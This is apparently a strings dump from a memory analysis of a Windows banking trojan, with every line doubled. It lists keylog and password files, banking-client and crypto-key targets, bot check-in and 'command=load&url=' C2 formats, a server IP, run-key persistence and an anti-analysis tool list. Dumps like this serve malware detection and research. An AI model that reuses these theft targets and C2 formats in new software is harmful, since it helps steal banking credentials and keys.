HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
NETWORKSERVICE!XP1!F9BE9A8A
NETWORKSERVICE!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1100_rwx_02FE0000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1100_rwx_032C0000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;.
SSShp;.
SSSh0 .
SSSh0 .
SSShpk.
SSShpk.
SSShpF.
SSShpF.
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
